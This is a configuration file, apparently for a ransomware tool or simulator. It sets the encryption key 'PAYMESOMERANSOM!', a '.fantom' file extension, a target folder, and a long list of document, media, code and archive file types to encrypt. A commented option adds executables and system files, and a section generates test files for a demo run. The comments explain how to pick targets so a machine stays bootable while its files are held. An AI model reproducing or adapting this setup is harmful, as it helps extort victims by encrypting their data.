[DEFAULT]
KEY = PAYMESOMERANSOM!
RENAME_FILES = False
RENAME_EXTENSION = .fantom
PATH = C:\Temp
# This is a file extension list of all files that may want to be encrypted.
# They are grouped by category. If a category is not wanted, Comment that line.
# All files uncommented by default should be harmless to the system
# that is: Encrypting all files of all the below types should leave a system in a bootable state,
# BUT applications which depend on such resources may become broken.
# This will not cover all files, but it should be a decent range.
ENCRYPT_EXTENSIONS = jpg,jpeg,bmp,gif,png,svg,psd,raw,mp3,mp4,m4a,aac,ogg,flac,wav,wma,aiff,ape,avi,flv,m4v,mkv,mov,mpg,mpeg,wmv,swf,3gp,doc,docx,xls,xlsx,ppt,pptx,odt,odp,ods,txt,rtf,tex,pdf,epub,md,yml,yaml,json,xml,csv,db,sql,dbf,mdb,iso,html,htm,xhtml,php,asp,aspx,js,jsp,css,c,cpp,cxx,h,hpp,hxx,java,class,jar,ps,bat,vb,awk,sh,cgi,pl,ada,swift,go,py,pyc,bf,coffee,zip,tar,tgz,bz2,7z,rar,bak,
# DANGEROUS: including exe, dll, so
# ENCRYPT_EXTENSIONS = exe,dll,so,rpm,deb,vmlinuz,img,jpg,jpeg,bmp,gif,png,svg,psd,raw,mp3,mp4,m4a,aac,ogg,flac,wav,wma,aiff,ape,avi,flv,m4v,mkv,mov,mpg,mpeg,wmv,swf,3gp,doc,docx,xls,xlsx,ppt,pptx,odt,odp,ods,txt,rtf,tex,pdf,epub,md,yml,yaml,json,xml,csv,db,sql,dbf,mdb,iso,html,htm,xhtml,php,asp,aspx,js,jsp,css,c,cpp,cxx,h,hpp,hxx,java,class,jar,ps,bat,vb,awk,sh,cgi,pl,ada,swift,go,py,pyc,bf,coffee,zip,tar,tgz,bz2,7z,rar,bak,

[GENERATE_FILES]
FILES_TO_GENERATE = 10
FILENAME = test
EXTENSIONS = doc,docx,xls,xlsx,ppt,pptx,odt,odp,ods,txt,rtf,tex,pdf,epub,md,yml,yaml,json,xml,csv,go,py,pyc,bf,coffee,bak


